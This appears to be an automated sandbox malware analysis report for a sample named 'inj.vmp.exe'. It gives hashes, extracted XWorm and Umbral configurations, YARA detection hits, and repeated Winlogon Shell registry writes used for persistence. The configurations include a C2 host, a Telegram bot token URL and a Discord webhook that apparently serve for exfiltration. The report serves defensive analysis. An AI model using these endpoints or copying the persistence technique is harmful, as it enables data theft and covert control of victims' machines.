Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 12:30
Behavioral task
behavioral1
Sample
inj.vmp.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
inj.vmp.exe
Resource
win10v2004-20240426-en
General
-
Target
inj.vmp.exe
-
Size
22.7MB
-
MD5
dee1c4a8e532d17e7df879ec1a6c976b
-
SHA1
6a037eb25dc446471df9799fabf60e605e609736
-
SHA256
769b8a2310c87fdd9be0e00525d0f347b7e0d7fd8e5ecf17f1aa119889b1e654
-
SHA512
326b6ca9ef7487acf89e4d6a3f29984a371dd20e2e5e0fb3269a4a7ecb79984a3d133617d5025aa759441b1fd54f1953a356ccffa847f17774e3b5ec64b308a3
-
SSDEEP
393216:ML1qcoAyijQ73qEjyqB+oriLjzLYlH5g68q4gsVEmoOZCStRQO2Wv:UqksXyqB3AjPYli6ZRWQO2C
Malware Config
Extracted
xworm
5.0
127.0.0.1:64360
19.ip.gl.ply.gg:64360
fQ7cS52Kya0qPDrO
-
Install_directory
%Public%
-
install_file
drivers win gui32-64.exe
-
telegram
https://api.telegram.org/bot7428011234:AAGLbtvNd_gYGzKdTJ5RNt6COu1jCeNidCs/sendMessage?chat_id=6043308554
Extracted
umbral
https://discord.com/api/webhooks/1245665414894063698/9HY7oZoZyztJUOo37jUN0IUaDDWwrbOgYQ06gp0QdpH2eHf05kVC8yRyvqaZKUVdWnAm
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000014aa2-68.dat family_umbral behavioral1/memory/2724-151-0x0000000000A50000-0x0000000000A90000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001500000001471d-49.dat family_xworm behavioral1/memory/2660-162-0x0000000000BB0000-0x0000000000BD8000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 25 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\", \"C:\\Windows\\Downloaded Program Files\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\", \"C:\\Windows\\Downloaded Program Files\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Users\\Default User\\Idle.exe\", \"C:\\Windows\\L2Schemas\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\", \"C:\\Windows\\Downloaded Program Files\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Users\\Default User\\Idle.exe\", \"C:\\Windows\\L2Schemas\\creal.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\", \"C:\\Windows\\Downloaded Program Files\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\", \"C:\\Windows\\system\\creal.exe\", \"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\", \"C:\\driverdllnetdhcp\\lsm.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\", \"C:\\Windows\\Downloaded Program Files\\csrss.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\", \"C:\\Users\\Default User\\Idle.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\", \"C:\\Program Files (x86)\\Common Files\\lsm.exe\", \"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\", \"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\", \"C:\\driverdllnetdhcp\\111.exe\", \"C:\\driverdllnetdhcp\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\My Documents\\creal.exe\", \"C:\\driverdllnetdhcp\\creal.exe\", \"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\"" Chainblock.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
